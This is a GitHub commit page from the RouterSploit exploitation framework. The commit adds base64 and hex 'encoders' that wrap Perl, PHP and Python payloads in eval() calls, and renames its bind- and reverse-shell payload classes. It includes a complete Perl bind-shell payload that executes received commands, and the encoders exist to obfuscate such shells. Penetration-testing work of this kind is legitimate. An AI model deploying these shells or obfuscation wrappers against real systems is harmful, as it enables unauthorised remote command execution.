Skip to content

R
routersploit
Unverified Commit e29ba771 by Marcin Bury Committed by GitHub
Options

Encoders (#472) 

* Initial work on encoders

* Adding tests and docs to initial encoders
parent b925c019
Showing with 749 additions and 216 deletions
docs/modules/encoders/perl/base64.md 0 → 100644
## Description
Module encodes Perl payload to base64 format.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use encoders/perl/base64`
3. Do: `show info`
## Scenarios
```
rsf > use encoders/perl/base64
rsf (Perl Base64 Encoder) > show info
Name:
Perl Base64 Encoder
Description:
Module encodes PERL payload to Base64 format.
Authors:
- Marcin Bury <marcin[at]threat9.com>
```
docs/modules/encoders/php/base64.md 0 → 100644
## Description
Module encodes PHP payload to base64 format.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use encoders/php/base64`
3. Do: `show info`
## Scenarios
```
rsf > use encoders/php/base64
rsf (PHP Base64 Encoder) > show info
Name:
PHP Base64 Encoder
Description:
Module encodes PHP payload to Base64 format.
Authors:
- Marcin Bury <marcin[at]threat9.com>
```
docs/modules/encoders/php/hex.md 0 → 100644
## Description
Module encodes PHP payload to Hex format.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use encoders/php/hex`
3. Do: `show info`
## Scenarios
```
rsf > use encoders/php/hex
rsf (PHP Hex Encoder) > show info
Name:
PHP Hex Encoder
Description:
Module encodes PHP payload to Hex format.
Authors:
- Marcin Bury <marcin[at]threat9.com>
```
docs/modules/encoders/python/base64.md 0 → 100644
## Description
Module encodes Python payload to base64 format.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use encoders/python/base64`
3. Do: `show info`
## Scenarios
```
rsf > use encoders/python/base64
rsf (Python Base64 Encoder) > show info
Name:
Python Base64 Encoder
Description:
Module encodes Python payload to Base64 format.
Authors:
- Marcin Bury <marcin[at]threat9.com>
```
routersploit/core/exploit/encoders.py 0 → 100644
from routersploit.core.exploit.exploit import (
BaseExploit,
)
from routersploit.core.exploit.printer import (
print_error,
)
class BaseEncoder(BaseExploit):
architecture = None
def __init__(self):
self.module_name = self.__module__.replace("routersploit.modules.encoders.", "").replace(".", "/")
def encode(self):
raise NotImplementedError("Please implement 'encode()' method")
def run(self):
print_error("Module cannot be run")
def __str__(self):
return self.module_name
def __format__(self, form):
return format(self.module_name, form)
routersploit/core/exploit/payloads.py
import os
import importlib
from collections import namedtuple from collections import namedtuple
from struct import pack from struct import pack
from future.utils import with_metaclass from future.utils import with_metaclass
...@@ -24,7 +26,7 @@ from routersploit.core.exploit.utils import ( ...@@ -24,7 +26,7 @@ from routersploit.core.exploit.utils import (
) )
architectures = namedtuple("ArchitectureType", ["ARMLE", "MIPSBE", "MIPSLE", "X86", "X64"]) architectures = namedtuple("ArchitectureType", ["ARMLE", "MIPSBE", "MIPSLE", "X86", "X64", "PERL", "PHP", "PYTHON"])
payload_handlers = namedtuple("PayloadHandlers", ["BIND_TCP", "REVERSE_TCP"]) payload_handlers = namedtuple("PayloadHandlers", ["BIND_TCP", "REVERSE_TCP"])
Architectures = architectures( Architectures = architectures(
...@@ -33,6 +35,9 @@ Architectures = architectures( ...@@ -33,6 +35,9 @@ Architectures = architectures(
MIPSLE="mipsle", MIPSLE="mipsle",
X86="x86", X86="x86",
X64="x64", X64="x64",
PERL="perl",
PHP="php",
PYTHON="python",
) )
PayloadHandlers = payload_handlers( PayloadHandlers = payload_handlers(
...@@ -98,7 +103,10 @@ class BindTCPPayloadMixin(with_metaclass(ExploitOptionsAggregator, object)): ...@@ -98,7 +103,10 @@ class BindTCPPayloadMixin(with_metaclass(ExploitOptionsAggregator, object)):
class BasePayload(BaseExploit): class BasePayload(BaseExploit):
architecture = None
handler = None handler = None
encoder = OptString("", "Encoder")
fmt = None
def __init__(self): def __init__(self):
if self.handler not in PayloadHandlers: if self.handler not in PayloadHandlers:
...@@ -114,14 +122,43 @@ class BasePayload(BaseExploit): ...@@ -114,14 +122,43 @@ class BasePayload(BaseExploit):
def run(self): def run(self):
raise NotImplementedError() raise NotImplementedError()
def get_encoders(self):
path = "routersploit/modules/encoders/{}".format(self.architecture)
class ArchitectureSpecificPayload(BasePayload): encoders = []
architecture = None
output = OptString('python', 'Output type: elf/c/python') try:
filepath = OptString( files = os.listdir(path)
"/tmp/{}".format(random_text(8)), 'Output file to write' except FileNotFoundError:
) return []
for f in files:
if not f.startswith("__") and f.endswith(".py"):
encoder = f.replace(".py", "")
module_path = "{}/{}".format(path, encoder).replace("/", ".")
module = getattr(importlib.import_module(module_path), "Encoder")
encoders.append((
"{}/{}".format(self.architecture, encoder),
module._Encoder__info__["name"],
module._Encoder__info__["description"],
))
return encoders
def get_encoder(self, encoder):
module_path = "routersploit/modules/encoders/{}".format(encoder).replace("/", ".")
try:
module = getattr(importlib.import_module(module_path), "Encoder")
except ImportError:
return None
return module()
class ArchitectureSpecificPayload(BasePayload):
output = OptString("python", "Output type: elf/c/python")
filepath = OptString("/tmp/{}".format(random_text(8)), "Output file to write")
def __init__(self): def __init__(self):
super(ArchitectureSpecificPayload, self).__init__() super(ArchitectureSpecificPayload, self).__init__()
...@@ -144,7 +181,7 @@ class ArchitectureSpecificPayload(BasePayload): ...@@ -144,7 +181,7 @@ class ArchitectureSpecificPayload(BasePayload):
return return
if self.output == "elf": if self.output == "elf":
with open(self.filepath, 'wb+') as f: with open(self.filepath, "wb+") as f:
print_status("Building ELF payload") print_status("Building ELF payload")
content = self.generate_elf(data) content = self.generate_elf(data)
print_success("Saving file {}".format(self.filepath)) print_success("Saving file {}".format(self.filepath))
...@@ -162,6 +199,8 @@ class ArchitectureSpecificPayload(BasePayload): ...@@ -162,6 +199,8 @@ class ArchitectureSpecificPayload(BasePayload):
"No such option as {}".format(self.output) "No such option as {}".format(self.output)
) )
return content
def generate_elf(self, data): def generate_elf(self, data):
elf = self.header + data elf = self.header + data
...@@ -210,6 +249,13 @@ class ArchitectureSpecificPayload(BasePayload): ...@@ -210,6 +249,13 @@ class ArchitectureSpecificPayload(BasePayload):
class GenericPayload(BasePayload): class GenericPayload(BasePayload):
def run(self): def run(self):
print_status("Generating payload") print_status("Generating payload")
print_info(
self.generate() payload = self.generate()
) if self.encoder:
payload = self.encoder.encode(payload)
if self.fmt:
payload = self.fmt.format(payload)
print_info(payload)
return payload
routersploit/core/exploit/utils.py
...@@ -78,7 +78,13 @@ def import_exploit(path): ...@@ -78,7 +78,13 @@ def import_exploit(path):
try: try:
module = importlib.import_module(path) module = importlib.import_module(path)
return getattr(module, "Exploit") if hasattr(module, "Payload"):
return getattr(module, "Payload")
elif hasattr(module, "Encoder"):
return getattr(module, "Encoder")
elif hasattr(module, "Exploit"):
return getattr(module, "Exploit")
except (ImportError, AttributeError, KeyError) as err: except (ImportError, AttributeError, KeyError) as err:
raise RoutersploitException( raise RoutersploitException(
"Error during loading '{}'\n\n" "Error during loading '{}'\n\n"
......
routersploit/interpreter.py
...@@ -31,6 +31,7 @@ from routersploit.core.exploit.printer import ( ...@@ -31,6 +31,7 @@ from routersploit.core.exploit.printer import (
printer_queue printer_queue
) )
from routersploit.core.exploit.exploit import GLOBAL_OPTS from routersploit.core.exploit.exploit import GLOBAL_OPTS
from routersploit.core.exploit.payloads import BasePayload
import readline import readline
...@@ -207,7 +208,7 @@ class RoutersploitInterpreter(BaseInterpreter): ...@@ -207,7 +208,7 @@ class RoutersploitInterpreter(BaseInterpreter):
self.raw_prompt_template = None self.raw_prompt_template = None
self.module_prompt_template = None self.module_prompt_template = None
self.prompt_hostname = "rsf" self.prompt_hostname = "rsf"
self.show_sub_commands = ("info", "options", "devices", "all", "creds", "exploits", "scanners", "wordlists") self.show_sub_commands = ("info", "options", "devices", "all", "encoders", "creds", "exploits", "scanners", "wordlists")
self.global_commands = sorted(["use ", "exec ", "help", "exit", "show ", "search "]) self.global_commands = sorted(["use ", "exec ", "help", "exit", "show ", "search "])
self.module_commands = ["run", "back", "set ", "setg ", "check"] self.module_commands = ["run", "back", "set ", "setg ", "check"]
...@@ -238,12 +239,13 @@ class RoutersploitInterpreter(BaseInterpreter): ...@@ -238,12 +239,13 @@ class RoutersploitInterpreter(BaseInterpreter):
Join Threat9 Beta Program - https://www.threat9.com Join Threat9 Beta Program - https://www.threat9.com
Exploits: {exploits_count} Scanners: {scanners_count} Creds: {creds_count} Generic: {generic_count} Payloads: {payloads_count} Exploits: {exploits_count} Scanners: {scanners_count} Creds: {creds_count} Generic: {generic_count} Payloads: {payloads_count} Encoders: {encoders_count}
""".format(exploits_count=self.modules_count["exploits"], """.format(exploits_count=self.modules_count["exploits"],
scanners_count=self.modules_count["scanners"], scanners_count=self.modules_count["scanners"],
creds_count=self.modules_count["creds"], creds_count=self.modules_count["creds"],
generic_count=self.modules_count["generic"], generic_count=self.modules_count["generic"],
payloads_count=self.modules_count["payloads"]) payloads_count=self.modules_count["payloads"],
encoders_count=self.modules_count["encoders"])
def __parse_prompt(self): def __parse_prompt(self):
raw_prompt_default_template = "\001\033[4m\002{host}\001\033[0m\002 > " raw_prompt_default_template = "\001\033[4m\002{host}\001\033[0m\002 > "
...@@ -343,6 +345,13 @@ class RoutersploitInterpreter(BaseInterpreter): ...@@ -343,6 +345,13 @@ class RoutersploitInterpreter(BaseInterpreter):
def command_set(self, *args, **kwargs): def command_set(self, *args, **kwargs):
key, _, value = args[0].partition(" ") key, _, value = args[0].partition(" ")
if key in self.current_module.options: if key in self.current_module.options:
if key == "encoder":
value = self.current_module.get_encoder(value)
if not value:
print_error("Encoder not available. Check available encoders with `show encoders`.")
return
setattr(self.current_module, key, value) setattr(self.current_module, key, value)
self.current_module.exploit_attributes[key][0] = value self.current_module.exploit_attributes[key][0] = value
...@@ -451,6 +460,17 @@ class RoutersploitInterpreter(BaseInterpreter): ...@@ -451,6 +460,17 @@ class RoutersploitInterpreter(BaseInterpreter):
print_table(headers, *wordlists, max_column_length=100) print_table(headers, *wordlists, max_column_length=100)
@module_required
def _show_encoders(self, *args, **kwargs):
if issubclass(self.current_module.__class__, BasePayload):
encoders = self.current_module.get_encoders()
if encoders:
headers = ("Encoder", "Name", "Description")
print_table(headers, *encoders, max_column_length=100)
return
print_error("No encoders available")
def __show_modules(self, root=''): def __show_modules(self, root=''):
for module in [module for module in self.modules if module.startswith(root)]: for module in [module for module in self.modules if module.startswith(root)]:
print_info(module.replace('.', os.sep)) print_info(module.replace('.', os.sep))
......
routersploit/modules/encoders/perl/base64.py 0 → 100644
from base64 import b64encode
from routersploit.core.exploit.encoders import BaseEncoder
from routersploit.core.exploit.payloads import Architectures
class Encoder(BaseEncoder):
__info__ = {
"name": "Perl Base64 Encoder",
"description": "Module encodes PERL payload to Base64 format.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
architecture = Architectures.PERL
def encode(self, payload):
encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8")
return "use MIME::Base64;eval(decode_base64('{}'));".format(encoded_payload)
routersploit/modules/encoders/php/base64.py 0 → 100644
from base64 import b64encode
from routersploit.core.exploit.encoders import BaseEncoder
from routersploit.core.exploit.payloads import Architectures
class Encoder(BaseEncoder):
__info__ = {
"name": "PHP Base64 Encoder",
"description": "Module encodes PHP payload to Base64 format.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
architecture = Architectures.PHP
def encode(self, payload):
encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8")
return "eval(base64_decode('{}'));".format(encoded_payload)
routersploit/modules/encoders/php/hex.py 0 → 100644
from binascii import hexlify
from routersploit.core.exploit.encoders import BaseEncoder
from routersploit.core.exploit.payloads import Architectures
class Encoder(BaseEncoder):
__info__ = {
"name": "PHP Hex Encoder",
"description": "Module encodes PHP payload to Hex format.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
architecture = Architectures.PHP
def encode(self, payload):
encoded_payload = str(hexlify(bytes(payload, "utf-8")), "utf-8")
return "eval(hex2bin('{}'));".format(encoded_payload)
routersploit/modules/encoders/python/base64.py 0 → 100644
from base64 import b64encode
from routersploit.core.exploit.encoders import BaseEncoder
from routersploit.core.exploit.payloads import Architectures
class Encoder(BaseEncoder):
__info__ = {
"name": "Python Base64 Encoder",
"description": "Module encodes Python payload to Base64 format.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
architecture = Architectures.PYTHON
def encode(self, payload):
encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8")
return "exec('{}'.decode('base64'))".format(encoded_payload)
routersploit/modules/payloads/armle/bind_tcp.py
...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import ( ...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import (
) )
class Exploit(BindTCPPayloadMixin, ArchitectureSpecificPayload): class Payload(BindTCPPayloadMixin, ArchitectureSpecificPayload):
__info__ = { __info__ = {
"name": "ARMLE Bind TCP", "name": "ARMLE Bind TCP",
"description": "Creates interactive tcp bind shell for ARMLE architecture.", "description": "Creates interactive tcp bind shell for ARMLE architecture.",
......
routersploit/modules/payloads/armle/reverse_tcp.py
...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import ( ...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import (
) )
class Exploit(ReverseTCPPayloadMixin, ArchitectureSpecificPayload): class Payload(ReverseTCPPayloadMixin, ArchitectureSpecificPayload):
__info__ = { __info__ = {
"name": "ARMLE Reverse TCP", "name": "ARMLE Reverse TCP",
"description": "Creates interactive tcp reverse shell for ARMLE architecture.", "description": "Creates interactive tcp reverse shell for ARMLE architecture.",
......
routersploit/modules/payloads/cmd/awk_bind_tcp.py
...@@ -2,7 +2,7 @@ from routersploit.core.exploit import * ...@@ -2,7 +2,7 @@ from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import BindTCPPayloadMixin, GenericPayload from routersploit.core.exploit.payloads import BindTCPPayloadMixin, GenericPayload
class Exploit(BindTCPPayloadMixin, GenericPayload): class Payload(BindTCPPayloadMixin, GenericPayload):
__info__ = { __info__ = {
"name": "Awk Bind TCP", "name": "Awk Bind TCP",
"description": "Creates an interactive tcp bind shell by using (g)awk.", "description": "Creates an interactive tcp bind shell by using (g)awk.",
......
routersploit/modules/payloads/cmd/awk_bind_udp.py
...@@ -2,7 +2,7 @@ from routersploit.core.exploit import * ...@@ -2,7 +2,7 @@ from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import BindTCPPayloadMixin, GenericPayload from routersploit.core.exploit.payloads import BindTCPPayloadMixin, GenericPayload
class Exploit(BindTCPPayloadMixin, GenericPayload): class Payload(BindTCPPayloadMixin, GenericPayload):
__info__ = { __info__ = {
"name": "Awk Bind UDP", "name": "Awk Bind UDP",
"description": "Creates an interactive udp bind shell by using (g)awk.", "description": "Creates an interactive udp bind shell by using (g)awk.",
......
routersploit/modules/payloads/cmd/awk_reverse_tcp.py
...@@ -2,7 +2,7 @@ from routersploit.core.exploit import * ...@@ -2,7 +2,7 @@ from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin
class Exploit(ReverseTCPPayloadMixin, GenericPayload): class Payload(ReverseTCPPayloadMixin, GenericPayload):
__info__ = { __info__ = {
"name": "Awk Reverse TCP", "name": "Awk Reverse TCP",
"description": "Creates an interactive tcp reverse shell by using (g)awk.", "description": "Creates an interactive tcp reverse shell by using (g)awk.",
......
routersploit/modules/payloads/cmd/bash_reverse_tcp.py
...@@ -2,7 +2,7 @@ from routersploit.core.exploit import * ...@@ -2,7 +2,7 @@ from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin
class Exploit(ReverseTCPPayloadMixin, GenericPayload): class Payload(ReverseTCPPayloadMixin, GenericPayload):
__info__ = { __info__ = {
"name": "Bash Reverse TCP", "name": "Bash Reverse TCP",
"description": "Creates interactive tcp reverse shell by using bash.", "description": "Creates interactive tcp reverse shell by using bash.",
......
routersploit/modules/payloads/cmd/netcat_bind_tcp.py
...@@ -2,7 +2,7 @@ from routersploit.core.exploit import * ...@@ -2,7 +2,7 @@ from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import BindTCPPayloadMixin, GenericPayload from routersploit.core.exploit.payloads import BindTCPPayloadMixin, GenericPayload
class Exploit(BindTCPPayloadMixin, GenericPayload): class Payload(BindTCPPayloadMixin, GenericPayload):
__info__ = { __info__ = {
"name": "Netcat Bind TCP", "name": "Netcat Bind TCP",
"description": "Creates interactive tcp bind shell by using netcat.", "description": "Creates interactive tcp bind shell by using netcat.",
......
routersploit/modules/payloads/cmd/netcat_reverse_tcp.py
...@@ -2,7 +2,7 @@ from routersploit.core.exploit import * ...@@ -2,7 +2,7 @@ from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin
class Exploit(ReverseTCPPayloadMixin, GenericPayload): class Payload(ReverseTCPPayloadMixin, GenericPayload):
__info__ = { __info__ = {
"name": "Netcat Reverse TCP", "name": "Netcat Reverse TCP",
"description": "Creates interactive tcp reverse shell by using netcat.", "description": "Creates interactive tcp reverse shell by using netcat.",
......
routersploit/modules/payloads/cmd/perl_bind_tcp.py
from routersploit.core.exploit import * from routersploit.core.exploit import *
from routersploit.modules.payloads.perl.bind_tcp import Exploit as PerlBindTCP from routersploit.modules.payloads.perl.bind_tcp import Payload as PerlBindTCP
class Exploit(PerlBindTCP): class Payload(PerlBindTCP):
__info__ = { __info__ = {
"name": "Perl Bind TCP One-Liner", "name": "Perl Bind TCP One-Liner",
"description": "Creates interactive tcp bind shell by using perl one-liner.", "description": "Creates interactive tcp bind shell by using perl one-liner.",
...@@ -14,7 +14,6 @@ class Exploit(PerlBindTCP): ...@@ -14,7 +14,6 @@ class Exploit(PerlBindTCP):
cmd = OptString("perl", "Perl binary") cmd = OptString("perl", "Perl binary")
def generate(self): def generate(self):
payload = super(Exploit, self).generate() self.fmt = self.cmd + " -MIO -e \"{}\""
payload = super(Payload, self).generate()
cmd = "{} -MIO -e \"{}\"".format(self.cmd, payload) return payload
return cmd
routersploit/modules/payloads/cmd/perl_reverse_tcp.py
from routersploit.core.exploit import * from routersploit.core.exploit import *
from routersploit.modules.payloads.perl.reverse_tcp import Exploit as PerlReverseTCP from routersploit.modules.payloads.perl.reverse_tcp import Payload as PerlReverseTCP
class Exploit(PerlReverseTCP): class Payload(PerlReverseTCP):
__info__ = { __info__ = {
"name": "Perl Reverse TCP One-Liner", "name": "Perl Reverse TCP One-Liner",
"description": "Creates interactive tcp reverse shell by using perl one-liner.", "description": "Creates interactive tcp reverse shell by using perl one-liner.",
...@@ -14,7 +14,6 @@ class Exploit(PerlReverseTCP): ...@@ -14,7 +14,6 @@ class Exploit(PerlReverseTCP):
cmd = OptString("perl", "Perl binary") cmd = OptString("perl", "Perl binary")
def generate(self): def generate(self):
payload = super(Exploit, self).generate() self.fmt = self.cmd + " -MIO -e \"{}\""
payload = super(Payload, self).generate()
cmd = "{} -MIO -e \"{}\"".format(self.cmd, payload) return payload
return cmd
routersploit/modules/payloads/cmd/php_bind_tcp.py
from routersploit.core.exploit import * from routersploit.core.exploit import *
from routersploit.modules.payloads.php.bind_tcp import Exploit as PHPBindTCP from routersploit.modules.payloads.php.bind_tcp import Payload as PHPBindTCP
class Exploit(PHPBindTCP): class Payload(PHPBindTCP):
__info__ = { __info__ = {
"name": "PHP Bind TCP One-Liner", "name": "PHP Bind TCP One-Liner",
"description": "Creates interactive tcp bind shell by using php one-liner.", "description": "Creates interactive tcp bind shell by using php one-liner.",
...@@ -14,7 +14,6 @@ class Exploit(PHPBindTCP): ...@@ -14,7 +14,6 @@ class Exploit(PHPBindTCP):
cmd = OptString("php", "PHP binary") cmd = OptString("php", "PHP binary")
def generate(self): def generate(self):
payload = super(Exploit, self).generate() self.fmt = self.cmd + ' -r "{}"'
payload = super(Payload, self).generate()
cmd = '{} -r "{}"'.format(self.cmd, payload) return payload
return cmd
routersploit/modules/payloads/cmd/php_reverse_tcp.py
from routersploit.core.exploit import * from routersploit.core.exploit import *
from routersploit.modules.payloads.php.reverse_tcp import Exploit as PHPReverseTCP from routersploit.modules.payloads.php.reverse_tcp import Payload as PHPReverseTCP
class Exploit(PHPReverseTCP): class Payload(PHPReverseTCP):
__info__ = { __info__ = {
"name": "PHP Reverse TCP One-Liner", "name": "PHP Reverse TCP One-Liner",
"description": "Creates interactive tcp reverse shell by using php one-liner.", "description": "Creates interactive tcp reverse shell by using php one-liner.",
...@@ -14,7 +14,6 @@ class Exploit(PHPReverseTCP): ...@@ -14,7 +14,6 @@ class Exploit(PHPReverseTCP):
cmd = OptString("php", "PHP binary") cmd = OptString("php", "PHP binary")
def generate(self): def generate(self):
payload = super(Exploit, self).generate() self.fmt = self.cmd + ' -r "{}"'
payload = super(Payload, self).generate()
cmd = '{} -r "{}"'.format(self.cmd, payload) return payload
return cmd
routersploit/modules/payloads/cmd/python_bind_tcp.py
from routersploit.core.exploit import * from routersploit.core.exploit import *
from routersploit.modules.payloads.python.bind_tcp import Exploit as PythonBindTCP from routersploit.modules.payloads.python.bind_tcp import Payload as PythonBindTCP
class Exploit(PythonBindTCP): class Payload(PythonBindTCP):
__info__ = { __info__ = {
"name": "Python Reverse TCP One-Liner", "name": "Python Reverse TCP One-Liner",
"description": "Creates interactive tcp bind shell by using python one-liner.", "description": "Creates interactive tcp bind shell by using python one-liner.",
...@@ -14,7 +14,6 @@ class Exploit(PythonBindTCP): ...@@ -14,7 +14,6 @@ class Exploit(PythonBindTCP):
cmd = OptString("python", "Python binary") cmd = OptString("python", "Python binary")
def generate(self): def generate(self):
payload = super(Exploit, self).generate() self.fmt = self.cmd + ' -c "{}"'
payload = super(Payload, self).generate()
cmd = '{} -c "{}"'.format(self.cmd, payload) return payload
return cmd
routersploit/modules/payloads/cmd/python_bind_udp.py
from routersploit.core.exploit import * from routersploit.core.exploit import *
from routersploit.modules.payloads.python.bind_udp import Exploit as PythonBindUDP from routersploit.modules.payloads.python.bind_udp import Payload as PythonBindUDP
class Exploit(PythonBindUDP): class Payload(PythonBindUDP):
__info__ = { __info__ = {
"name": "Python Bind UDP One-Liner", "name": "Python Bind UDP One-Liner",
"description": "Creates interactive udp bind shell by using python one-liner.", "description": "Creates interactive udp bind shell by using python one-liner.",
...@@ -14,7 +14,6 @@ class Exploit(PythonBindUDP): ...@@ -14,7 +14,6 @@ class Exploit(PythonBindUDP):
cmd = OptString("python", "Python binary") cmd = OptString("python", "Python binary")
def generate(self): def generate(self):
payload = super(Exploit, self).generate() self.fmt = self.cmd + ' -c "{}"'
payload = super(Payload, self).generate()
cmd = '{} -c "{}"'.format(self.cmd, payload) return payload
return cmd
routersploit/modules/payloads/cmd/python_reverse_tcp.py
from routersploit.core.exploit import * from routersploit.core.exploit import *
from routersploit.modules.payloads.python.reverse_tcp import Exploit as PythonReverseTCP from routersploit.modules.payloads.python.reverse_tcp import Payload as PythonReverseTCP
class Exploit(PythonReverseTCP): class Payload(PythonReverseTCP):
__info__ = { __info__ = {
"name": "Python Reverse TCP One-Liner", "name": "Python Reverse TCP One-Liner",
"description": "Creates interactive tcp reverse shell by using python one-liner.", "description": "Creates interactive tcp reverse shell by using python one-liner.",
...@@ -14,7 +14,6 @@ class Exploit(PythonReverseTCP): ...@@ -14,7 +14,6 @@ class Exploit(PythonReverseTCP):
cmd = OptString("python", "Python binary") cmd = OptString("python", "Python binary")
def generate(self): def generate(self):
payload = super(Exploit, self).generate() self.fmt = self.cmd + ' -c "{}"'
payload = super(Payload, self).generate()
cmd = '{} -c "{}"'.format(self.cmd, payload) return payload
return cmd
routersploit/modules/payloads/cmd/python_reverse_udp.py
from routersploit.core.exploit import * from routersploit.core.exploit import *
from routersploit.modules.payloads.python.reverse_udp import Exploit as PythonBindUDP from routersploit.modules.payloads.python.reverse_udp import Payload as PythonBindUDP
class Exploit(PythonBindUDP): class Payload(PythonBindUDP):
__info__ = { __info__ = {
"name": "Python Reverse UDP One-Liner", "name": "Python Reverse UDP One-Liner",
"description": "Creates interactive udp reverse shell by using python one-liner.", "description": "Creates interactive udp reverse shell by using python one-liner.",
...@@ -14,7 +14,6 @@ class Exploit(PythonBindUDP): ...@@ -14,7 +14,6 @@ class Exploit(PythonBindUDP):
cmd = OptString("python", "Python binary") cmd = OptString("python", "Python binary")
def generate(self): def generate(self):
payload = super(Exploit, self).generate() self.fmt = self.cmd + ' -c "{}"'
payload = super(Payload, self).generate()
cmd = '{} -c "{}"'.format(self.cmd, payload) return payload
return cmd
routersploit/modules/payloads/mipsbe/bind_tcp.py
...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import ( ...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import (
) )
class Exploit(BindTCPPayloadMixin, ArchitectureSpecificPayload): class Payload(BindTCPPayloadMixin, ArchitectureSpecificPayload):
__info__ = { __info__ = {
"name": "MIPSBE Bind TCP", "name": "MIPSBE Bind TCP",
"description": "Creates interactive tcp bind shell for MIPSBE architecture.", "description": "Creates interactive tcp bind shell for MIPSBE architecture.",
......
routersploit/modules/payloads/mipsbe/reverse_tcp.py
...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import ( ...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import (
) )
class Exploit(ReverseTCPPayloadMixin, ArchitectureSpecificPayload): class Payload(ReverseTCPPayloadMixin, ArchitectureSpecificPayload):
__info__ = { __info__ = {
"name": "MIPSBE Reverse TCP", "name": "MIPSBE Reverse TCP",
"description": "Creates interactive tcp reverse shell for MIPSBE architecture.", "description": "Creates interactive tcp reverse shell for MIPSBE architecture.",
......
routersploit/modules/payloads/mipsle/bind_tcp.py
...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import ( ...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import (
) )
class Exploit(BindTCPPayloadMixin, ArchitectureSpecificPayload): class Payload(BindTCPPayloadMixin, ArchitectureSpecificPayload):
__info__ = { __info__ = {
"name": "MIPSLE Bind TCP", "name": "MIPSLE Bind TCP",
"description": "Creates interactive tcp bind shell for MIPSLE architecture.", "description": "Creates interactive tcp bind shell for MIPSLE architecture.",
......
routersploit/modules/payloads/mipsle/reverse_tcp.py
...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import ( ...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import (
) )
class Exploit(ReverseTCPPayloadMixin, ArchitectureSpecificPayload): class Payload(ReverseTCPPayloadMixin, ArchitectureSpecificPayload):
__info__ = { __info__ = {
"name": "MIPSLE Reverse TCP", "name": "MIPSLE Reverse TCP",
"description": "Creates interactive tcp reverse shell for MIPSLE architecture.", "description": "Creates interactive tcp reverse shell for MIPSLE architecture.",
......
routersploit/modules/payloads/perl/bind_tcp.py
from base64 import b64encode from routersploit.core.exploit.option import OptString
from routersploit.core.exploit.payloads import BindTCPPayloadMixin, GenericPayload from routersploit.core.exploit.payloads import (
GenericPayload,
Architectures,
BindTCPPayloadMixin,
)
from routersploit.modules.encoders.perl.base64 import Encoder
class Exploit(BindTCPPayloadMixin, GenericPayload): class Payload(BindTCPPayloadMixin, GenericPayload):
__info__ = { __info__ = {
"name": "Perl Bind TCP", "name": "Perl Bind TCP",
"description": "Creates interactive tcp bind shell by using perl.", "description": "Creates interactive tcp bind shell by using perl.",
...@@ -11,14 +16,14 @@ class Exploit(BindTCPPayloadMixin, GenericPayload): ...@@ -11,14 +16,14 @@ class Exploit(BindTCPPayloadMixin, GenericPayload):
), ),
} }
architecture = Architectures.PERL
encoder = OptString(Encoder(), "Encoder")
def generate(self): def generate(self):
payload = ( return (
"use IO;foreach my $key(keys %ENV){" + "use IO;foreach my $key(keys %ENV){" +
"if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort," + "if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort," +
str(self.rport) + str(self.rport) +
",Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){" + ",Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){" +
"if($_=~ /(.*)/){system $1;}};" "if($_=~ /(.*)/){system $1;}};"
) )
encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8")
return "use MIME::Base64;eval(decode_base64('{}'));".format(encoded_payload)
routersploit/modules/payloads/perl/reverse_tcp.py
from base64 import b64encode from routersploit.core.exploit.option import OptString
from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin from routersploit.core.exploit.payloads import (
GenericPayload,
Architectures,
ReverseTCPPayloadMixin,
)
from routersploit.modules.encoders.perl.base64 import Encoder
class Exploit(ReverseTCPPayloadMixin, GenericPayload): class Payload(ReverseTCPPayloadMixin, GenericPayload):
__info__ = { __info__ = {
"name": "Perl Reverse TCP", "name": "Perl Reverse TCP",
"description": "Creates interactive tcp reverse shell by using perl.", "description": "Creates interactive tcp reverse shell by using perl.",
...@@ -11,8 +16,11 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload): ...@@ -11,8 +16,11 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload):
), ),
} }
architecture = Architectures.PERL
encoder = OptString(Encoder(), "Encoder")
def generate(self): def generate(self):
payload = ( return (
"use IO;foreach my $key(keys %ENV){" + "use IO;foreach my $key(keys %ENV){" +
